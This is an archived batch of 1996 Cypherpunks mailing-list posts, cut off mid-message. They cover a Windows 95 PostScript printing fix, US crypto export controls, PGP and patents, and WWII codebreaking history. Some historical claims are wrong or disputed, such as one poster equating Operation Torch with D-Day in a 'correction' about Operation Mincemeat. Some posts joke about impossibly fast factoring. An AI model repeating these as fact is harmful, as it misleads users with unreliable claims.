Date: Sat, 27 Jan 1996 08:41:43 +0800
To: Louis Freeh <cypherpunks@toad.com>
Subject: [NOISY] Printing Microsoft's CryptoAPI .ps
In-Reply-To: <2.2.32.19960126184329.002dbed0@isdn.net>
Message-ID: <Pine.ULT.3.91.960126125847.19154L-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


The problems futplex et al were having are the result of a known
incompatibility between Windows [95] and many print spoolers. You can fix
it like so: 

Date: Thu, 14 Dec 1995 17:41:02 -0800 (PST)
From: Rich Graves <llurch@networking.Stanford.EDU>
To: win95netbugs@lists.Stanford.EDU
Subject: Fix for PostScript printer "PJL" Error (printing PostScript code rather than image)

Shamelessly lifted from the discussion forum on NetWork 
World's Web site, http://nwfusion.com/

-rich
 owner-win95netbugs@lists.stanford.edu
 ftp://ftp.stanford.edu/pub/mailing-lists/win95netbugs/
 gopher://quixote.stanford.edu/1m/win95netbugs
 http://www-leland.stanford.edu/~llurch/win95netbugs/faq.html

>From ohara on Wed Nov 1 12:14:40 1995

I have a problem when printing to postscript printers spooled from unix 
hosts. I am running Win95 and FTP Software's
Interdrive 95 (for the lpr client).

The problem is that the printer spits out pages of postscript code 
rather than the page the code represents. This
happens only when I print over the network. If I plug directly into the 
printer, everything works fine.

It seems that Microsoft improved the pscript.drv to also send "PJL" code 
to printers. Thus, the actual postscript is
surrounded by PJL. Redirect a postscript printer to a file and take a look.

Unfortunately, this causes the spooler on the unix host to identify the 
print job as a plain ascii file, rather than a
postscript file. Other than manually editting every print job and 
copying it to the printer port, is there a way to
eliminate the PJL and get my networked printers working again?

-Bob


>From ohara on Thu Nov 2 11:23:54 1995

I have figured out how to excise the offending PJL commands from the 
postcript output stream. Every printer that is
added to Win 95 puts a unique file into the windows system directory. In 
my case the file is ibm4039p.spd. This file
seems to be a control file for pscript.drv as well as the customization 
of the properties dialog for the printer. 

In my case there are several lines that include the word "PJL": 

*Protocols: PJL TBCP

and

*JCLBegin: "<1B>%-12345X@PJL JOB<0A>"
*JCLToPSInterpreter: "@PJL ENTER LANGUAGE = Postscript <0A>"
*JCLEnd: "<1B>%-12345X@PJL EOJ <0A><1B>%-12345X"

When I deleted these lines from the .spd file and restarted Win95, the 
problem was gone. -Bob
===========================================================================
Sent through the win9netbugs list. To unsubscribe, send an email message to
majordomo@lists.stanford.edu with "unsubscribe win95netbugs" in the *body*.
Note spelling. URL for FAQ and further info is in each message's X-headers.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sat, 27 Jan 1996 08:02:06 +0800
To: cypherpunks@toad.com
Subject: Doctor Denning's URL
Message-ID: <199601262106.NAA14246@netcom21.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I screwed up and mistyped the URL in my prior message
referencing Dorothy Denning's updated article on "The Future
of Cyptography."

The correct URL, pasted directly from my browser which is
now displaying the article, is...

http://guru.cosc.georgetown.edu/~denning/crypto/Future.html

Sorry about that. 

--  
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 27 Jan 1996 06:21:13 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto Exports, Europe, and Conspiracy Theories
Message-ID: <ad2e6b6f1a02100406fa@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:06 PM 1/26/96, Alex Strasheim wrote:

>Why aren't foreign companies flooding America with strong crypto?  Well,
>there are clearly pressures of the sort Tim described at work.  But there
>are other factors as well:

Let me emphasize that I was raising the issue as food for thought, as an
obvious question. Put another way, there are a lot of non-U.S.
cryptographers, Cypherpunks, and programmers. They  should be looking at
the (putative) $60 billion a year cost of the ITARS as evidence that a
market for strong crypto probably exists.

(I will be interested to see what non-U.S. code gets developed over the
next year or two, and how the U.S. government reacts to its importation
into the U.S. The main RSA patents will soon be expiring, those that don't
get thrown out in the wake of the RSA-Cylink-MIT-Stanford-PKP-Schlafly-etc.
brouhaha, that is.)

>o       Crypto isn't at the top of the list of factors when people pick
>        software.  Do most of use use 40-bit downloadable Netscape's
...

Maybe not important for casual users, but there's that $60 billion a year
figure again, so somebody cares. And digital commerce is front page news
almost every day, with security a major hot topic.

>o       Most foreign countries aren't wired as well as we in the US are.
>        Most people in Switzerland don't have cheap easy access to the net,

Though of course many countries are extremely well-wired. The Scandinavian
countries, for example. And the U.K. (e.g., demon, one of the earliest
full-service ISPs). But I don't want to get into a debate about numbers of
subscribers, etc. My main point was that crypto tool development has
traditionally been possible with fairly small teams...so I wonder why more
development has not happened in Europe and Asia, given the apparently
compelling advantages of not having to worry about the U.S. ITARs! (That
this "apparently" may not actually be so real is of course my main "food
for thought.")

>        for example.  That's one reason that the web, a good Swiss idea, has
>        been developed primarily in this country.  America has more people
>        thinking about the net than other countries do, and it's not
>        surprising that we're out in front in net software.

A minor correction. Tim Berners-Lee is British, and was only working at
CERN, which effectively straddles the French-Swiss border, near Geneva. And
he is now, or was recently, working in New York. I would have a hard time
calling his work "a Swiss idea."

Obviously many of the ideas that go into the Web (hypertext, a la Bush and
Nelson, connectivity, ISPs, etc.) are heavily American-based or
-influenced.

>Digicash is probably the first significant crypto product to be exported
>to America.  It's not very popular yet, but I think that most of us here
>agree that it is, in potential at least, as significant as
>Mosaic/Netscape.  It's important to note that this extremely important
>product couldn't have been produced here, patents aside.  Transaction
>systems need to be international, and our rules make America an unsuitable
>place from which to launch tranaction software.

I agree about Digicash (and I cited it as an example in my first article).
However, the lack of available crypto for export, and the cloudy situation
about Chaum's patents (*) has made Digicash almost a footnote in the race
for digital commerce, with a dozen other more visible product announcements
in the news.

(* I wrote up my views on the problems with software patents, having to do
with the inability to "meter usage," in contrast with physical objects such
as microprocessors.)

--Tim

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Sat, 27 Jan 1996 05:39:43 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Crypto Exports, Europe, and Conspiracy Theories
In-Reply-To: <ad2bf34e04021004d2fa@[205.199.118.202]>
Message-ID: <199601261906.NAA03072@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


There's a lot I don't know about the NSA, Tim's original post in this
thread reminded me of that.  I don't know if they'll continue to be
successful supressing crypto -- perhaps (probably?) I've underestimated
them. 

But I think networking is creating an enormous commercial demand for 
strong crypto that didn't previously exist.  It's one thing to suppress 
an esoteric technology that few people feel the need for;  it's quite 
another to suppress a reasonably well understood technology that everyone 
feels they need to run their businesses.

The NSA is powerful, but so are commercial interests.  I tend to think 
that the money will win out in the end, but I have to admit that I don't 
know enough about the NSA to have a serious opinion.

Why aren't foreign companies flooding America with strong crypto?  Well, 
there are clearly pressures of the sort Tim described at work.  But there 
are other factors as well:

o	Crypto has only recently become useful/necessary to lots of
	business people -- the demand from crypto is born out of the
	networking boom, especially the Internet, which isn't picky
	about who can use it.  American software companies dominate 
	the industry -- they grabbed market share in the days before 
	crypto was vital.  There's inertia at work.

o	Crypto isn't at the top of the list of factors when people pick
	software.  Do most of use use 40-bit downloadable Netscape's
	or Mosaics with strong crypto?  Netscape wouldn't be easy to
	pick off for New Delhi programmers (an understatement, of course), 
	and crypto wouldn't give them as big of an advantage as it probably
	ought to.

o	Most foreign countries aren't wired as well as we in the US are.
	Most people in Switzerland don't have cheap easy access to the net,
	for example.  That's one reason that the web, a good Swiss idea, has
	been developed primarily in this country.  America has more people
	thinking about the net than other countries do, and it's not 
	surprising that we're out in front in net software.

These factors are short lived, and they're not going to keep crypto out of
America forever.  (That doesn't mean the NSA can't -- although I don't 
think they can.)

Digicash is probably the first significant crypto product to be exported
to America.  It's not very popular yet, but I think that most of us here
agree that it is, in potential at least, as significant as
Mosaic/Netscape.  It's important to note that this extremely important
product couldn't have been produced here, patents aside.  Transaction
systems need to be international, and our rules make America an unsuitable
place from which to launch tranaction software.

Will the NSA be able to stand up against growing economic pressures?  I 
don't know.  But it does seem pretty clear that those pressures are 
building all the time, and that the problem of supressing crypto in 1996 
is a much tougher one than it was in 1986.

In general, it's myopic and ill advised to focus on one factor -- 
economics, politcs, the national security establishment -- when trying to 
predict what will happen.  I've probably been guilty of placing too much 
emphasis on money, and not enough on the NSA.

We do seem to be winning, though.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Sat, 27 Jan 1996 06:01:37 +0800
To: tallpaul@pipeline.com (tallpaul)
Subject: Re: John Doe
Message-ID: <2.2.32.19960126190807.00674f78@midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


At 02:07 AM 1/26/96 -0500, tallpaul@pipeline.com wrote:
>On Jan 25, 1996 20:58:48, 'jdoe-0007@alpha.c2.org' wrote: 
>>The John Doe NYM/Remailer interface for Windows is a most excellent 
>>program that will allow even the most cypher-illiterate to make use of 
>>the technology that has been the exclusive domain of those in the 
>>"techno-know".  It was a piece of cake to set up, obtain a NYM and select 
>>inbound and outbound remailers with options to chain as many as your 
>>paranoia deemed appropriate. 
>>$25.00 seemed a little steep but they will get my $$$.  Nice Job. 
>>John Doe 0007 
>(Unlike jdoe-0007 I think $25 is a very low price to pay for the new
>capacity. What the hell! We're not gonna' pay for it out of our own lazy
>pockets. We'll raise the tax on hot tubs and get other people to buy it for
>us.) 
I haven't DL'ed/pirated/bought it yet, but what does it do that Joel
McNamara's Private Idaho doesn't do?  (BTW, PI is _freeware_ as in
$25 less than $25.)

dave

(dsmith@alpha.c2.org - see, it doesn't have to be anonymous after all)

---
David E. Smith, c/o Southeast Missouri State University
1210 Towers South, Cape Girardeau MO USA 63701-4745
+1(573)339-3814, "dsmith@midwest.net", PGP ID 0x961D2B09
Do not use old PGP keys 0x92732139 and 0xFF829C15.
http://www.midwest.net/scribers/dsmith/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 29 Jan 1996 03:42:06 +0800
To: Asgaard <cypherpunks@toad.com
Subject: Re: "Gentlemen do not read each other's mail"
Message-ID: <m0tfvPA-00092VC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 04:22 PM 1/26/96 +0100, Asgaard wrote:
>Jim Bell wrote:
>
>> While this may be based on the "classic" view of the start of the direct 
>> involvement in WWII, I agree with the opinion of an old college professor 
>> that the US KNEW that the Japanese were going to attack, SOMEWHERE and 
>> SOMEWHEN (but not exactly), and in fact WANTED the attack to occur to 
>> justify getting into a war that we "should" have entered.
>
>Alan Horowitz added:
>
>>I've read that FDR had a humint source warning of a Japanese strike on 
>>Pearl Harbor. I also recall reading that J Edgar Hoover received a report 
>>of a diplomatic conversation detailing the planned attack, but sat on it.
>
>And this is from a post I sent to the list last summer:
>***************************************************************
>I just read 'Infamy' by John Toland (1982), containing 'proof'
>- very convincing, in my opinion - of the Pearl Harbour cover-up.
>The US president, selected members of his cabinette and a
>few admirals and generals knew - from Magic and the 'winds'
>execute, radio traffic analysis, diplomatic sources, double
>agents - exactly when and where the Japaneese were going to
>attack, but didn't warn Hawaii, fearing that too efficient
>counter-measures by the Oahu military might make the attack
>abort and so not convince the isolationists. The unexpected 
>tactical capabilities of the Japaneese armada then made a
>cover-up all the more important.
>*****************************************************************
>The unfortunate cipher expert Captain Safford spent most of
>his post-war life trying to uphold the honour of his fellow
>cryptanalysts, putting the blame on generals and politicians,
>but in vain.

It's interesting that we even HEARD about Coventry, but of course that was a 
British decision, a civilian target in an attack during an era where there 
were already plenty of attacks on civilian targets, and the British 
UNDERSTOOD why Coventry had to die.  (But I don't know WHEN "we" (the 
general public) first heard about Coventry.  Anybody know?

(For the historically-impaired:  Coventry was/is an English town (small 
city?) perhaps most famous from the Lady Godiva legend...but I digress...    
 British found out, I guess through Ultra, that it was going to be bombed.  
Telling the inhabitants would have saved many lives, but (possibly) alerted 
the Germans that Enigma had been broken.  British made the correct choice:  
Let the city get bombed without (much?) warning.  The value of keeping the 
broken-ness of Ultra a secret far outweighed the value of Coventry.)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQlC2fqHVDBboB2dAQGfpgP+NloVapAgqC3NxGg7TcVMnx+Q1Cmu2B/w
Alp8q6uFvWsRqutFZ2+oDElHFxnZiMwZ0sgJkP0xG57TGoRob/DHY1h3+/NN9sYi
KApzJHaElMrPFzwgMRLHNOBU/SQ3GsYDA2i4hWZM5ojsqXJQ7H7ov5FFJLGdV1u1
cOb/mUN8q9Y=
=SRGU
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 29 Jan 1996 03:40:23 +0800
To: "Robert A. Rosenberg" <hal9001@panix.com>
Subject: Re: "Gentlemen do not read each other's mail"
Message-ID: <m0tfvVg-0008yDC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 01:40 PM 1/26/96 -0500, Robert A. Rosenberg wrote:
>At 20:18 1/25/96, jim bell wrote:
>
>>Now, I was born in 1958 and thus can't claim personal knowledge of the time,
>>but it's truly amazing how UNPERCEPTIVE the public must have been in the
>>late 40's and early '50s about "intelligence" realities.  Let me give you a
>>specific example:  The classic movie, "The Man who Never Was," relates the
>>(true) story of a counter-intelligence mission done by the British to (I
>>think) mislead the Germans into believing that the attack on Sicily would be
>>substantially LATER than it actually was.
>
>The code name for the project was "Operation Mincemeat" and the intent was
>to get the defences at Normandy ("Operation Torch" - ie: D-Day) away from
>there and transferred to Sicily (which was NOT a D-Day objective) not as
>you say to fool them on when the attack was coming. It did its job and much
>of the mobile coastal defences were moved out of the area.

I apologize for the error (presuming it's an error).  I was working from an 
old memory there, from reading a book called "A Bodyguard of Lies"  (William 
Cave Brown?) which addresses the misinformation/disinformation campaigns 
that went on during WWII.  And, of course, seeing the movie "The Man who Never
 Was."
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQlEXfqHVDBboB2dAQHwlwP8DJt2Vg5jmI/gQ8dV5rXJ6mgHFwmzAcMA
12kJWWUJzQg/6M/acTtwTntUYaT9sJ5nxfE6mV58KEpGRuz76ZAZ3LSugG/DlAAx
NL1AMqhcv1Xelh+UD7tLqhH/lTt5mDJC0pWWquyOi85l8TOo05142BUOYL9YPx6q
6XjRqUgIDu8=
=CcUZ
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Post Office <postmaster@direct.ca>
Date: Sat, 27 Jan 1996 08:39:09 +0800
To: owner-cypherpunks@toad.com
Subject: Returned mail: Delivery problems with your mail
Message-ID: <96Jan26.132010-0800pdt.205130-997+1@orb.direct.ca>
MIME-Version: 1.0
Content-Type: text/plain

A copy of your message is being returned to you due to difficulties
encountered while attempting to deliver your mail.

The following errors occurred during message delivery processing:

<local ewanchuk@direct.ca ewanchuk 38>: user "ewanchuk" doesn't exist


Reporting-MTA: dns; orb.direct.ca
Arrival-Date: Fri, 26 Jan 1996 13:20:00 -0800


Final-Recipient: X-LOCAL; ewanchuk
Action: failed
Status: 5.1.1 (User does not exist)
Diagnostic-Code: 550 (User does not exist)


To: hal9001@panix.com, pgut001@cs.auckland.ac.nz
Subject: Re: "Concryption" Prior Art
From: Peter Wayner <pcw@access.digex.net>
Date: Fri, 26 Jan 1996 13:55:07 -0500
Cc: cypherpunks@toad.com
Sender: owner-cypherpunks@toad.com

I believe the patent applies to simultaneous compression and encryption.
The simultaneity supposedly saves time. That's the big advance. 

-Peter



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jims@conch.aa.msen.com (Jim Schueler)
Date: Sat, 27 Jan 1996 10:24:57 +0800
Subject: Windows PGP mail reader
Message-ID: <4eaksb$6i9@recepsen.aa.msen.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi.  Can anyone recommend a Windows based email/POP3 reader that can decrypt
content?  Please reply  via email:
	
Jim Schueler
jims@msen.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 27 Jan 1996 09:00:41 +0800
To: Matt Miszewski <ecarp@netcom.com
Subject: Re: Bernie S. Sentencing
Message-ID: <m0tfvie-00091MC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:02 PM 1/26/96 -36000, Matt Miszewski wrote:
>On Thu, 25 Jan 1996, Ed Carp, KHIJOL SysAdmin wrote:
>
>(snip)
>> The last thing one of the "suits" said was something like "they know 
>> about the hole in RSA we found with the quantum computer" - or that's 
>> what was reportedly said.  Something like that.
>
>The AP line came down that the matchbook contained the algorithm for 
>easily factoring large primes. 

As I heard it, their algorithm factored large composite numbers in 
((log(n))**(-1)) time, meaning that the larger the composite number got the 
faster it was to factor.  Yep, that's it. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Sat, 27 Jan 1996 05:11:11 +0800
To: pgut001@cs.auckland.ac.nz
Subject: Re: "Concryption" Prior Art
Message-ID: <v02140a00ad2e2ce86dc4@[165.254.158.226]>
MIME-Version: 1.0
Content-Type: text/plain


At 19:04 1/26/96, pgut001@cs.auckland.ac.nz wrote:

>However the Con-cryption patent covers first compressing, then
>encrypting.

Isn't that how PGP does its thing (first compress the data and then feed it
into the Encryption Stage)? PGP is prior art in-and-of-itself.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Sat, 27 Jan 1996 05:25:38 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: "Gentlemen do not read each other's mail"
Message-ID: <v02140a00ad2ecd258f93@[165.254.158.226]>
MIME-Version: 1.0
Content-Type: text/plain


At 20:18 1/25/96, jim bell wrote:

>Now, I was born in 1958 and thus can't claim personal knowledge of the time,
>but it's truly amazing how UNPERCEPTIVE the public must have been in the
>late 40's and early '50s about "intelligence" realities.  Let me give you a
>specific example:  The classic movie, "The Man who Never Was," relates the
>(true) story of a counter-intelligence mission done by the British to (I
>think) mislead the Germans into believing that the attack on Sicily would be
>substantially LATER than it actually was.

The code name for the project was "Operation Mincemeat" and the intent was
to get the defences at Normandy ("Operation Torch" - ie: D-Day) away from
there and transferred to Sicily (which was NOT a D-Day objective) not as
you say to fool them on when the attack was coming. It did its job and much
of the mobile coastal defences were moved out of the area.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gorkab@sanchez.com (Brian Gorka)
Date: Sat, 27 Jan 1996 05:33:32 +0800
To: "'Cypherpunks Mailing List'" <cypherpunks@toad.com>
Subject: No Subject
Message-ID: <01BAEBF5.1492F480@loki>
MIME-Version: 1.0
Content-Type: text/plain


I was leafing through the new terms of service from my ISP, and lookie what I came up with:

.... stuff deleted

 * Posting private e-mail to any newsgroup or mailing list without
   the explicit approval of the sender is strictly prohibited.

 * Impersonating another user or otherwise falsifying one's user name
   in e-mail or any post to any newsgroup or mailing list is
   strictly prohibited.

 * We reserve the right to take whatever actions we deem appropriate
   in enforcing these policies, including the ones below.  We also
   reserve the right to change these policies without prior notice at any
   time.

... stuff deleted

   The actions we take may include account suspension or termination. We
   do not issue any credits for accounts cancelled due to policy
   violations.
 

The second point make me wonder if NymServers are logal to use with my service (PSInet, Interramp)




----------
Brian Gorka
Key fingerprint =  ED 7D 78 7E 95 E8 05 01  27 01 A1 74 FA 4B 86 53 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Wayner <pcw@access.digex.net>
Date: Sat, 27 Jan 1996 05:33:51 +0800
To: pgut001@cs.auckland.ac.nz
Subject: Re: "Concryption" Prior Art
Message-ID: <199601261855.NAA16966@access5.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


I believe the patent applies to simultaneous compression and encryption.
The simultaneity supposedly saves time. That's the big advance. 

-Peter




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geoff klein <geoff@commtouch.co.il>
Date: Fri, 26 Jan 1996 21:05:39 +0800
To: tcmay@got.net
Subject: Re: PGP in Eudora and other mail programs
Message-ID: <9601261210.AB19065@commtouch.co.il>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
X-Pgprequest: signed
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary=dgjlnouteqkhfsmbcz97531sfhkmpi

> THIS IS A MESSAGE IN 'MIME' FORMAT.  Your mail reader does not support MIME.
> Some parts of this will be readable as plain text.
> To see the rest, you will need to upgrade your mail reader.
--dgjlnouteqkhfsmbcz97531sfhkmpi
Content-Type: application/octet-stream
Content-Description: PGP encrypted file
Content-Transfer-Encoding: 7bit

-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: tcmay@got.net, cypherpunks@toad.com
Date: Fri Jan 26 14:30:46 1996

At Thu, 25 Jan 1996 11:54:46 -0800 Timothy C. May wrote:

>.....
> And yet how many of these programs actually can transparently
> (automatically, push-button, etc.) support PGP? 
>......


Commtouch is about to release Beta-1 of Pronto Secure. This will REALLY 
support PGP transparently, and as far as E-mail clients go, Pronto 
makes Eudora look like "sour grapes". We expect to announce a special Beta 
testing offer for c'punks in early February.


- ----------------------------------------------------------------------
Geoff Klein                                 email: geoff@commtouch.com
Product Manager - Pronto Secure             http:  //www.commtouch.com
- ----------------------------------------------------------------------
CommTouch SW Inc,  U.S        CommTouch, Israel        Home,    Israel
1206 W. Hillsdale Blvd        10 Technology Ave        27   Amishav St
San Mateo,    CA 94403        Ein Vered,  40696        Tel-Aviv, 67191
Tel:    (415) 578-6580        Tel: 972(9)963445        972 (3) 7321378
Fax:    (415) 578-8580        Fax: 972(9)961053        972 (3) 5716203
- ----------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAgUBMQlWGkLv5OMYFK1FAQFYeQQAqPXMk0fS7ZmFkV0rCD3goLgkCnfxbN6F
sPXZ08pHD2mH5MU50+gyprgJx87H/9OGwzR+pbGHtZP3QwucWBrwLCU2gj1dAzZ6
CGhrgZJTOa1XEKy9xzXJSuLXEAHuJYDQnmANVneRt04Ld0Z67QEW6cZHYCeVwHeH
KavQ4tAJ9WM=
=ouF2
-----END PGP SIGNATURE-----

--dgjlnouteqkhfsmbcz97531sfhkmpi--




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 26 Jan 1996 21:44:40 +0800
To: cypherpunks@toad.com
Subject: Denning's Crypto Archy
Message-ID: <199601261314.OAA13834@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Cypherptoady's updatest unscratchable crypto itch and salve:


http://www.cosc.georgetown.edu/~denning/crypto/Future.html







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 27 Jan 1996 06:02:17 +0800
To: Alex Strasheim <cp@proust.suba.com>
Subject: Re: Crypto Exports, Europe, and Conspiracy Theories
In-Reply-To: <199601261906.NAA03072@proust.suba.com>
Message-ID: <199601261926.OAA14913@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Alex Strasheim writes:
> Why aren't foreign companies flooding America with strong crypto?  Well, 
> there are clearly pressures of the sort Tim described at work.  But there 
> are other factors as well:
> 
> o	Crypto has only recently become useful/necessary to lots of
> 	business people -- the demand from crypto is born out of the
> 	networking boom, especially the Internet, which isn't picky
> 	about who can use it.

Security is an odd thing. I have clients who have obvious and very
extreme security needs that do not spend any real time worrying about
security and as a result end up being burned. However, until the day
you are burned, you never think about security and never notice it is
absent. To some extent, it is the job of consultants such as myself to
assure that firms understand what they have at stake and how to
protect themselves, especially by securing their communications
networks with cryptography.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <Kevin.L.Prigge-2@cis.umn.edu>
Date: Sat, 27 Jan 1996 07:37:39 +0800
To: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Subject: Re: [local] Report on Portland Cpunks meeting
In-Reply-To: <ad2be4eb00021004ee75@[132.162.233.188]>
Message-ID: <31093ac10192002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


Jonathan Rochkind said:
> 
> At 11:13 PM 01/23/96, Bruce Baugh wrote:
> >The nym signing is an idle thought of mine. I have a nym key which is, at
> >the moment, signed only by itself. I know friends of mine have nym accounts.
> >if we could assemble a group of folks whom I can trust enough to link the
> >nym and myself, it'd be nice to add some more signatures to the nym key, and
> >vice versa.
> 
> If, on the other hand, I sign "Toxic Avenger"'s key, then what benefit is
> this for third parties?  Since Toxic Avenger is, by intention, _not_ linked
> to a real person, I'm not saying that I feel confident that this key really
> belongs to any particular real person.  What am I saying?

That the key belongs to the person(s) assuming the identity of
"Toxic Avenger". When someone signs my key, they are saying that
they believe that the key belongs to me, a person who has the
identity of "Kevin Prigge". Since I am a real person, I can 
prove that some other entity knows me as Kevin Prigge via some form
of identification issued by the state, and I can prove that I 
control the key. For a 'nym, there is no identification that is
issued, which may be the point of having an 'nym. The best that
can be said is that the user@someplace posting with a 'nym of
"whatever" controls the key, which is all I'd be certifying with
my signature on the key.

-- 
Kevin L. Prigge         |"Have you ever gotten tired of hearing those 
UofM Central Computing  | ridiculous AT&T commercials claiming credit 
email: klp@tc.umn.edu   | for things that don't even exist yet? 
010010011101011001100010| You will." -Emmanuel Goldstein 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 27 Jan 1996 08:04:43 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto Exports, Europe, and Conspiracy Theories
Message-ID: <m0tfwoW-00091lC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:06 PM 1/26/96 -0800, Timothy C. May wrote:

>A minor correction. Tim Berners-Lee is British, and was only working at
>CERN, which effectively straddles the French-Swiss border, near Geneva.

Wouldn't it be awful for CERN if they had to get export/import licenses for 
PROTONS?  Each pass?

Sorry, couldn't resist.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 27 Jan 1996 08:35:34 +0800
To: perry@piermont.com
Subject: Re: "Gentlemen do not read each other's mail"
Message-ID: <m0tfwxE-0008z0C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:28 PM 1/26/96 -0500, Perry E. Metzger wrote:
>
>jim bell writes:
>> (For the historically-impaired:  Coventry was/is an English town (small 
>> city?) perhaps most famous from the Lady Godiva legend...but I digress...    
>>  British found out, I guess through Ultra, that it was going to be bombed.  
>> Telling the inhabitants would have saved many lives, but (possibly) alerted 
>> the Germans that Enigma had been broken.  British made the correct choice:  
>> Let the city get bombed without (much?) warning.  The value of keeping the 
>> broken-ness of Ultra a secret far outweighed the value of Coventry.)
>
>The current claim is that, in fact, there was no advance warning about
>Coventry and that the claims that there was are unsubstantiated.

Extremely odd!  Why distribute the claim, if it were false?!?  Hmmmmm.....  
And/or if the claim was falsely made by some non-governmental organization, 
why not an immediate and forceful denial?

Color me confused.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Sat, 27 Jan 1996 06:38:45 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Crippled Notes export encryption
In-Reply-To: <9601242357.AA02688@alpha>
Message-ID: <m0tfuBe-0004LyC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Mike McNally writes:

: Uhh, I'd like a second opinion please doc.  Are you suggesting that
: whenever anybody with cryptographic expertise (like, maybe, anybody on
: this mailing list) leaves the country we're in violation of munitions
: export laws?

No, but only because there is an express exception in the ITAR:
Section 120.17 of the ITAR provides:

  _Export_ means:

   (1) Sending or taking a defense article out of the United States in
   any manner, except by mere travel outside the United States by a
   person whose personal knowledge includes technical data; . . . .

: Is somebody who knows how to build a rocket in the same boat?

Yes.

But in one way the case may be worse for you cryptographers if you 
actually carry source code--or machine code--around inside your head.
For in the _Karn_ case the government has argued that source and
machine code are _not_ technical data, but are defense articles.  So,
unless you first erase that portion of your memory that contains the C
code for implementing the RSA algorithm, you commit a felony--a
million dollar fine and ten years in jail max--if you step outside the
United States without first obtaining a license from the Office of
Defense Trade Controls.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 27 Jan 1996 08:59:28 +0800
To: cypherpunks@toad.com
Subject: Re: Doctor Denning
Message-ID: <ad2e85e81d0210043f4b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:33 PM 1/26/96, Peter Monta wrote:
>> I just read the new and improved Dorothy Denning essay at
>>
